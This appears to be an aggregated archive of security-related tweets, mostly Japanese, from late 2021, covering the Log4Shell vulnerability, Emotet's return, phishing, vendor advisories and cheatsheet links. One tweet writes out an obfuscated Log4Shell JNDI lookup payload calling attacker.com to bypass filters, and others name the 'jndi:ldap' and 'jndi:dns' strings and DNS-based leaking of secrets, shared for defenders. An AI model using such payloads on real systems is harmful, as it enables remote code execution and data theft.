Best of OSINT Cheatsheet (Part 2) Credit https://t.co/9QY8ncwRqY #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #cissp #redteam #hackingtools #Windows #DataSecurity #privacy #OSINT https://t.co/Y6wZ4cVigL
— Hacking Articles (@hackinarticles) Dec 10, 2021
きたよ。。。 #log4j #log4j2 https://t.co/u1wJ8rB6z3
— moto_sato (@58_158_177_102) Dec 10, 2021
Welp. (log4j is incredibly common, although it sounds like the underlying vulnerability stems from people essentially directly printf-ing strings from users, like printf(user_string) instead of printf("%s", user_string).) https://t.co/zjLigHU0Mn
— Xenoveritas (@xenoveritas) Dec 10, 2021
log4j2の件、 - 情報をキャッチできるアンテナがある - 一次情報から攻撃方法と影響を読み取れる - 対象システムを即時に調査できる権限がある - Javaのクラスローダーについて知識がある - Javaのロギング事情がカオスなことを知っている という条件が揃ったエンジニアが必要なので多分沢山やられる。
— 嶋田大貴 (@shimariso) Dec 10, 2021
ちゃんと読まないとだめだな https://t.co/XIJo5Q9bYK
— イスラエルいくべぇ (@knqyf263) Dec 10, 2021
log4j、修正コミット見ればわかるんですが、"jndi:ldap:/"だけじゃなくて"jndi:dns:/"も効きました。脆弱性の有無調査を行うだけの攻撃ではこちらも使われると思うので、ログ調査する人は気を付けて (画像はlog4j同梱のGhidraで検証した) https://t.co/3x3stiN4Aw https://t.co/8rCe5QBmCf
— しゅーと (@shutingrz) Dec 10, 2021
もうこれインターネットの終わりでしょ https://t.co/2IuBTLyLHx
— イスラエルいくべぇ (@knqyf263) Dec 10, 2021
Log4j zero-day gets security fix just as scans for vulnerable systems ramp up https://t.co/OFAjCxjS3i
— piyokango (@piyokango) Dec 10, 2021
“log4jの脆弱性について” https://t.co/eCVcy9Su8v
— トマ村 (@tmhwq) Dec 10, 2021
CVE-2021-44228 - Log4j RCE 0-day mitigation with Cloudflare. https://t.co/aP4ZEAQL8H
— Cloudflare (@Cloudflare) Dec 10, 2021
SANSのInternet Storm CenterのThret LevelがYellowになってる。見始めたのはここ数年だけど、初めて見たかもしれない https://t.co/qtUDeYSRPn https://t.co/FFDDQ9np2A
— ほよたか (@takahoyo) Dec 10, 2021
思ったより拡散されてたのでコメントしますが、このdnsを使うのは元ツイにあるように「脆弱性の有無調査を行うだけ」を目的とした人だけです。名前解決が発生するだけで、これを利用してJNDIインジェクションはできません。これを読んでdnsでRCEできると思った人がいるっぽいので念のため...
— しゅーと (@shutingrz) Dec 10, 2021
各種情報が追加されたので補足。情報漏えいを目的とする攻撃でもdnsを使われると思います。あくまでdnsスキーマで効かないのはJNDIインジェクション。画像は環境変数のMYSQL_PASSWORDを名前解決をさせて情報漏えうさせる通信です。 https://t.co/YVDaBTlIhu
— しゅーと (@shutingrz) Dec 11, 2021
『dns』文字列では、RCEまで行かず、情報漏洩にはつながりそうな状況のようです。参照される方は、しゅーとさんの返信内容まで合わせて確認いただけると良いと思います。 https://t.co/eC4IuYHBQT
— モグ|セキュリティゼネラリスト (@moneymog) Dec 11, 2021
海外主要ソースが軒並みLog4jを報じています。 あっ。怖い事書いてあるな・・・。 「Log4j RCE:広く使用されているロギングユーティリティの重要な認証なしのコード実行ホールを塞ぐために発行された緊急パッチ」 https://t.co/LIbRFI5zem
— キタきつね (@foxbook) Dec 10, 2021
@hasegawayosukeさん、@kinugawamasatoさん、にしむねあさんとWebセキュリティやキャリアについて雑談しました! https://t.co/AudR2PYn2q
— Jun Kokatsu (@shhnjk) Dec 10, 2021
If you're filtering on "ldap", "jndi", or the ${lower:x} method, I have bad news for you: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} This gets past every filter I've found so far. There's no shortage of these bypasses. #log4j
— Brandon Forbes (@Rezn0k) Dec 11, 2021
Log4j2のコード実行脆弱性Log4Shell (CVE-2021-44228)についてのCrowdStrike記事。既に実際の悪用が確認されている。最新版ではJNDIセッションセキュリティ管理の制御設定が追加。NWでの推奨緩和策は、サーバからの外向き通信は信頼できるホスト・プロトコルのみとすること。 https://t.co/uMIxjTTUeZ
— kokum?t? (@__kokumoto) Dec 11, 2021
2021/12/5 セキュリティ関連Twitterメモ
はてなブログに投稿しました #はてなブログ #FoxonSecurity #セキュリティ 日本人パスワードは「数字」「キーボード配列」「日本人名」に加えて「繰り返し語」 - Fox on Security https://t.co/4SXHOo2HDK
— キタきつね (@foxbook) Nov 23, 2021
メールで #Phishing の注意喚起するのは最適解じゃないって広く知れ渡るといいな。デファングしてたとしても、その注意喚起のメールをパクられて #Phishing への誘導に悪用される懸念がある。ちゃんとSEOしてるページや公式アプリの「見やすいところ(これ重要)」で注意喚起すればいい。
— nakamuratomofumi (@tomoaxe) Nov 24, 2021
#vuls v0.19.0リリース! 米サイバーセキュリティ庁が先日公開した、野生の世界で実際に攻撃に使われている激ヤバCVEリストに該当するかを表示可能に。 https://t.co/DU8g7B8NFG 「 #セキュリティのアレ 第109回」で @MasafumiNegishi さんが紹介していたアレです。podcast定期購読しててよかった? https://t.co/CcQs0mQ5ws https://t.co/YF1cqudSUh
— vuls (@vuls_ja) Nov 24, 2021
11月よりAIセキュリティ情報発信ポータルの運用を開始しました。AI自体に対する攻撃が存在することを広く啓蒙するとともに、攻撃に対する防御手法をまとめて発信して参ります。AIの開発、利用時に認識しておくべきポイントを体系立てて纏めていきますので、ぜひご覧ください。 https://t.co/syHc7f89w8 https://t.co/6qBrhEBcy7
— MBSD NEWS (@mbsdnews) Nov 25, 2021
デジタル庁、報道機関向けのメール誤送信 アドレス400件をBCCではなくCCに記載 - ITmedia ビジネスオンライン https://t.co/5hpBvILCh8
— piyokango (@piyokango) Nov 24, 2021
ここでは、 2021/11/14以降に再構築されたマルウェア #Emotet とそのボットネット、それらを使う攻撃者(TA542、Mealybug)に関する情報を日本の情報を中心に世界の動向も交えながらまとめていきます。
— bom (@bomccss) Nov 16, 2021
スマートフォンの37%に音声チップの脆弱性、盗聴される恐れ https://t.co/1CPq01k9id
— モグ|セキュリティゼネラリスト (@moneymog) Nov 25, 2021
今日、警察庁から約400ページ分の不正指令電磁的記録罪の『申報』開示文書が届きました。現在内容を解析中です。ざっと最初の方を読んだけどCoinhive事件など仮想通貨のマイニングの摘発事件は県警独自の判断ではなく警察庁が指揮を執っていたとする記述があります。新事実だ。詳細は追って公開します https://t.co/wUDW65m1rv
— 齊藤貴義@『Wizard Bible事件から考えるサイバーセキュリティ』執筆中 (@miraihack) Nov 22, 2021
ドコモ装う不正アプリ被害、iPhoneでも確認 構成プロファイル悪用 https://t.co/3sc5aL00Tr https://t.co/qS0OimWIiG
— ITmedia NEWS (@itmedia_news) Nov 26, 2021
Best of Bug Bounty Mindmap #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytip https://t.co/SmcXtT2jG2
— Cybritex Security (@cybritexsec) Nov 26, 2021
JPCERT/CC's presentation materials regarding #Lazarus group presented at #codeblue_jp and #HITCON 2021 are now available on Github. ^YU https://t.co/9f9CQLpITn
— JPCERT/CC (@jpcert_en) Nov 26, 2021
Best of Penetration Testing Tools Cheatsheet (Part 2) #infosec #cybersecurity #pentesting #oscp #cheatsheet #vulnerabilities #informationsecurity #networking #hacking #nmap #metasploit #tools https://t.co/O32RGRWUgX
— Hacking Articles (@hackinarticles) Nov 26, 2021
Red Teaming and Blue Teaming Cheatsheet Credit : https://t.co/KF2djq3caJ #infosec #cybersecurity #pentesting #oscp #cheatsheet #vulnerabilities #informationsecurity #networking #wireshark #ctf #BlueTeam #Defence https://t.co/V1eHV7HfBM
— PentestSky (@pentestsky) Nov 26, 2021
2021/11/25(木)に 第13回 初心者のためのセキュリティ勉強会 で発表した資料です。 "スパイ養成CTF!? AVTokyo 2021の『Open xINT CTF』に参加した!" https://t.co/zoW3FguwdT 次の1年も技術研鑽を頑張ろう?? 目指せプロOSINTer! #sec4begin
— meow (@meow_noisy) Nov 27, 2021
ncはおろかNmapすら使えない場合を想定したPowerShellを用いたポートスキャニングテクニック。厳しくセキュリティコントロールされたワークステーションやプログラムのダウンロードができない環境で行うサバイバルであると言える。 https://t.co/tBrYr83D5C
— Новичо?к (@AlanIbr2049) Nov 27, 2021
Best of Penetration testing Certifications #infosec #cybersecurity #pentesting #oscp #cheatsheet #vulnerabilities #informationsecurity #Linux #hacking #ctf #BlueTeam #ITsecurity #ctf #bugbountytips https://t.co/49l9tKcQqH
— Hacking Articles (@hackinarticles) Nov 27, 2021
Cyber Security Certification Jobs Cheatsheet #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #jobs #cissp https://t.co/1TK9YKp9iQ
— Hacking Articles (@hackinarticles) Nov 27, 2021
Penetration Testing Tools Cheatsheet Credit : @compasssecurity #infosec #cybersecurity #pentesting #oscp #cheatsheet #vulnerabilities #informationsecurity #networking #hacking #nmap #metasploit #tools https://t.co/lJjP0yyTGA
— PentestSky (@pentestsky) Nov 28, 2021
Emotetの解析結果について(警察庁) https://t.co/mH4NB4kB0R
— にゃん☆たく (@taku888infinity) Nov 29, 2021
#Emotet artifacts, TTPs #DFIR Exec Flow: Office > CMD > PS > Rundll32 ?? #MalDoc Winword (docm) Excel (xlsm) RegSetValue HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[Random] Payload Path: C:\ProgramData\[Random].dll Export: Control_RunDLL https://t.co/vuGRR2U3V1
— Max_Malyutin (@Max_Mal_) Nov 28, 2021
Boss of the SOC 参加レポート - SSTエンジニアブログ https://t.co/KcHMWmFwm6 また参加してくださいね! #splunk
— 横田 聡 (@odorumurphys) Nov 29, 2021
Best of CISSP Cheatsheet (Part 1) Credit @Comparitech #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #riskmanagement #cissp https://t.co/dfc9ysMWiA
— Hacking Articles (@hackinarticles) Nov 29, 2021
Best of CISSP Cheatsheet (Part 2) Credit @Comparitech #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #riskmanagement #cissp https://t.co/XXlJlS0r7z
— Hacking Articles (@hackinarticles) Nov 29, 2021
「Zoom」アプリに待望の自動更新機能 ~Windows/Mac版の個人ユーザーでも利用可能に - 窓の杜 https://t.co/uWsSjpqe0J
— piyokango (@piyokango) Nov 30, 2021
急増する「ラテラルフィッシング」被害、2021年6月以降3倍に https://t.co/qBm2Zhe34e
— piyokango (@piyokango) Nov 29, 2021
2021年第3四半期のNICTER観測状況についてまとめたブログを公開しました! 「NICTER観測統計 - 2021年7月~9月」 https://t.co/zBkqwNlunx
— NICTER 解析チーム (@nicter_jp) Nov 30, 2021
お知らせ:CSIRTマテリアル更新 https://t.co/CwHKm8hzIn
— モグ|セキュリティゼネラリスト (@moneymog) Dec 1, 2021
『本キャンペーンの参加者は、本キャンペーンの実施期間中に、urlscan .io で対象となる Phishing サイトをスキャンすることでキャンペーンに参加することになります。』 LINE Anti Phishing キャンペーンを実施します。(2021/12/01 ~ 2022/02/28) https://t.co/pcRsz0UiUN
— Autumn Good (@autumn_good_35) Dec 2, 2021
Securify、少しだけ打ち合わせにも参加したのですが、自分たちの掲げるビジョンに基づいて、この領域を本当に変えようとしているプロダクトで将来性もヤバいので是非お試しください / スリーシェイク、自動脆弱性診断ツール「Securify」の無料提供を開始 | 3-shake https://t.co/MfldDeBFTB
— まつもとりー / Ryosuke Matsumoto (@matsumotory) Dec 1, 2021
マルウェアがよく悪用するWindows API: https://t.co/j8DTLzgsFK #マルウェア解析
— 田中ザック (@yamatosecurity) Dec 1, 2021
サイバー攻撃から1か月“機能停止”した病院のいま - Yahoo!ニュース https://t.co/AVYIKPjPxP https://t.co/TckrOir591
— セキュリティ・トレンド bot (@sec_trend) Dec 2, 2021
Emotetのテイクダウンなど各国法執行機関の協力でサイバー攻撃被害の減少が期待された2021年でしたが、結果としてはサイバー犯罪による社会への影響の大きい年となりました。2021年の締めくくりとして今年も2021年を振り返り、2022年のサイバー脅威の概況を予測します。 https://t.co/TrtmzjEM60 https://t.co/feTqutnJon
— Palo Alto NetworksJP (@PaloAltoNtwksJP) Dec 3, 2021
日経NETWORK(日経xTECH)連載「マルウエア徹底解剖」の今月号は、今年流出したランサムウェア攻撃グループ「Conti」の攻撃マニュアルの全貌とその内容を深掘りし分析&解説していきます。 <ランサム攻撃のマニュアルを読み解く> https://t.co/SMfGzBNAMl #ランサムウェア #サイバー攻撃 #Conti https://t.co/Jc3QZKVpQp
— MBSD NEWS (@mbsdnews) Dec 3, 2021
今年の12月は、TryHackMeに入門してアドベントカレンダーやってみることにしました。セキュリティの基礎知識を固めてくれそうな内容で、これなら無理なく最後まで走りきれそう。 これを機にセキュリティやCTFを始めるのにもとても良さそうなので、チョットセキュリティキニナルかたは是非!! https://t.co/iQRHVJqxH8
— kusuwada (@kusuwada) Dec 3, 2021
「個人情報保護規制の緩和、首相「具体的に考えたい」 会津若松市のスマートシティ視察」 https://t.co/f5qjaY0sNL 箱庭で緩和してもイノベーションにつながらない。日米欧の市場で勝負できなければDFFT政策もない。緩和というより医療創薬は仮名加工医療情報の特別法整備が鍵になるだろう。
— 鈴木 正朝 (@suzukimasatomo) Dec 4, 2021
2021/11/23 セキュリティ関連Twitterメモ
プリンターが止まらない 戦慄のランサムウエア 被害企業が語った|サイカルジャーナル|NHK NEWS WEB https://t.co/cIzvxfwdXl
— piyokango (@piyokango) Nov 9, 2021
セキュリティハイプサイクル(日本語)が出てます。(カタカナ率高いのがアレですが・・・) 「ガートナージャパン、2021年版のセキュリティハイプサイクルを発表」 https://t.co/6OcXW3oYzD
— キタきつね (@foxbook) Nov 9, 2021
マイクロソフトがExchange Server 2016/2019の不具合パッチを速やかに適用するよう警告。CVE-2021-42321が該当不具合。認証済の攻撃者による遠隔コード実行で、コマンドレット引数の不適切な検証に起因。既に限られた範囲で実際に悪用されていることが確認されている。 https://t.co/3hQORpGKhi
— kokum?t? (@__kokumoto) Nov 9, 2021
NRIセキュア、「MITRE ATT&CK」を用いたセキュリティ対策評価サービスを提供開始 ... https://t.co/cEs1xT3fmr https://t.co/pGWxwj75Uu
— セキュリティ・トレンド bot (@sec_trend) Nov 10, 2021
「攻めのセキュリティ」の研究の一環としてARM SoCに搭載されているCoreSightをファジングに活用したAFL++ CoreSight modeを公開しました。 詳細は下記のブログ記事をご覧ください。 https://t.co/oXgqHc0ONh
— 株式会社リチェルカセキュリティ (@RicercaSec_JP) Nov 10, 2021
11月に入り、新たなフィッシングによる被害の急増を観測しています。 できれば早期の警戒情報として自組織や関係組織、ご家族などに情報を共有いただき、脅威の認知と注意喚起に繋げていただけると幸いです。 https://t.co/vpDjVNVa1d
— ばらまきメール回収の会 (@retrieve_member) Nov 11, 2021
国内でも該当するとみられるものが結構ひっかかるのでご注意を。 『Randori has found numerous vulnerable instances exposed on internet-facing assets, in excess of 10,000 assets.』?? Zero-Day Disclosure: PAN GlobalProtect CVE-2021-3064 https://t.co/RjLwhl6Yw2 https://t.co/STWiZmoU1N
— Autumn Good (@autumn_good_35) Nov 11, 2021
『脆弱性に該当するバージョンPAN-OS 8.1~8.1.16の台数としてグローバルで6811台/日本国内で422台を確認できました。』 2021年11月12日 Palo Alto Networks社PAN-OSの脆弱性 CVE-2021-3064について - セキュリティ研究センターブログ https://t.co/KVeNRsueiN
— Autumn Good (@autumn_good_35) Nov 12, 2021
マクニカセキュリティ研究センターブログにて、2021年11月10日に公表されたPalo Alto Networks社のPAN-OSの脆弱性 CVE-2021-3064についての注意喚起記事を公開しました。 国内外で多くの脆弱なサーバを確認しておりますので、海外拠点含めて早めの対策をご検討ください。 https://t.co/CpOk9FKPXO
— 株式会社マクニカ ネットワークス カンパニー (@mncofficial2004) Nov 12, 2021
CTF大会開催はいいぞ。- 魔女のお茶会 2021冬 / Guide for holding CTF events https://t.co/PSF6BQhVxN CTFの運営、作問、インフラのノウハウがまとまってる!素晴らしい??
— ほよたか (@takahoyo) Nov 14, 2021
「サイバー犯罪防止シンポジウム2021 in Kawasaki ~サイバー空間の脅威から会社を守ろう~」の動画が公開されました。 https://t.co/ffpqKN64Fw
— 三輪信雄 (@NobMiwa) Nov 15, 2021
自社から送付する際はともかくとして、取引先から送付されたメールでもフィルタするってのは、大企業の慣習からすると結構思いきった施策だなぁ。 「ファイルを共有するための別の手段を用意」するとのことだけど、そうしたサイトにプロキシでアクセスできない環境もあるだろうし混乱するかもね。 https://t.co/TLjWuPB7iS
— Takahiro YAMADA (@yamadamn) Nov 15, 2021
ゾクゾクしちゃう話だな、名和さんのこの話は/”2つ目はコンテストで見つかった脆弱性の扱いに「透明性」がないこと。” WindowsもiPhoneも「陥落」 中国ハッキング大会: 日本経済新聞 https://t.co/kolDNCLojF
— Fuyuki Takasawa (@Neko_Ohji) Nov 15, 2021
【パスワード付きzipファイルが添付されたメールおよび別送のパスワード記載メール(PPAP)に対する当社運用の変更について】 2022年1月26日より「パスワード付きzipファイルをフィルタにより削除し、メール本文のみ受信する」となります。 詳細はこちらをご覧ください。 https://t.co/KIxbBwBHCr
— IIJ (@IIJ_PR) Nov 15, 2021
Emotet malware is back and rebuilding its botnet via TrickBot https://t.co/PlW710ux1z
— piyokango (@piyokango) Nov 15, 2021
Emotet botnet returns after law enforcement mass-uninstall operation - The Record by Recorded Future https://t.co/8PIMCg6aQI
— piyokango (@piyokango) Nov 15, 2021
Analysis of RDP Attack Surface and Its Security by sunglin of Knownsec 404 Team. Read it on Seebug paper https://t.co/OY7jIzZkiI https://t.co/Dis8PPiStc
— Seebug (@seebug_team) Nov 15, 2021
Update on #Emotet. We are noticing now that bots are starting to spam on what we are calling the Epoch 4 botnet. There is only attachment based malspam seen so far with .docm or .xlsm(really XLSM with a lame AF Template "Excell") or password protected ZIPs(operation ZipLock). 1/x
— Cryptolaemus (@Cryptolaemus1) Nov 16, 2021
Emotet payload URL (shared by @executemalware): ?? https://t.co/yBeV54SkYd Emotet payload (DLL): ?? https://t.co/tqHTQH6eQz
— abuse.ch (@abuse_ch) Nov 15, 2021
JavaScriptなどを悪用しローカルでマルウェア構築する攻撃手法が急増。Microsoftが注意喚起 https://t.co/gqykTOpqVK
— モグ|セキュリティゼネラリスト (@moneymog) Nov 17, 2021
17000台のルーターの脆弱性リスト https://t.co/EUrUUcbhDJ
— Sen UENO (@sen_u) Nov 17, 2021
10月に最も活発なマルウェアはTrickbot、5回目のランクイン - 産経ニュース https://t.co/dNu70uNmBk
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Nov 17, 2021
I created a #CyberChef recipe to ease the extraction of URLs from the word document (.doc & .docm) which download #Emotet. It is not completely foolproof, but it worked 99% of the time for me. https://t.co/CV0CVh4Hdo https://t.co/qKN2HHvS1q
— Kostas (@Kostastsale) Nov 18, 2021
【テイクダウンされた「 #EMOTET 」が活動再開】 2021年11月15日以降、各地のリサーチャからEMOTETの活動再開の報告がされています。当社でも、EMOTETを拡散させる #マルウェアスパム 、新たなEMOTET本体やおよびC&Cサーバの活動再開を確認しています。 詳しくは↓ https://t.co/WUSKKsLxWW
— トレンドマイクロ (@trendmicro_jp) Nov 18, 2021
— Satoshi Suzuki(gebo) (@gebogebogeboge) Nov 18, 2021
攻撃者視点で内部をチェックする際は、このサイトは役に立つかと思います。 Router Setup and Security Checklist https://t.co/XtLcmpMCNp 「ルーターのIPアドレスや初期パスワードなどを検索できるウェブサイト「Modemly」を使ってみた」 https://t.co/btT13uX9uf
— キタきつね (@foxbook) Nov 20, 2021
[アップデート] AWS WAFのログを直接CloudWatch LogsおよびS3に出力可能になりました | DevelopersIO https://t.co/8qw1E1zVkE
— モグ|セキュリティゼネラリスト (@moneymog) Nov 21, 2021
HISYS Security Journal Vol.44が公開となりました。坂明氏にJC3理事としてインタビューに登場いただいています。また、日本よりむしろ海外のハッカーコミュニティで有名なエル・ケンタロウさんにも話を伺っています。https://t.co/O6iojtiOgS
— Kenichi Saito (@hj_saito) Nov 22, 2021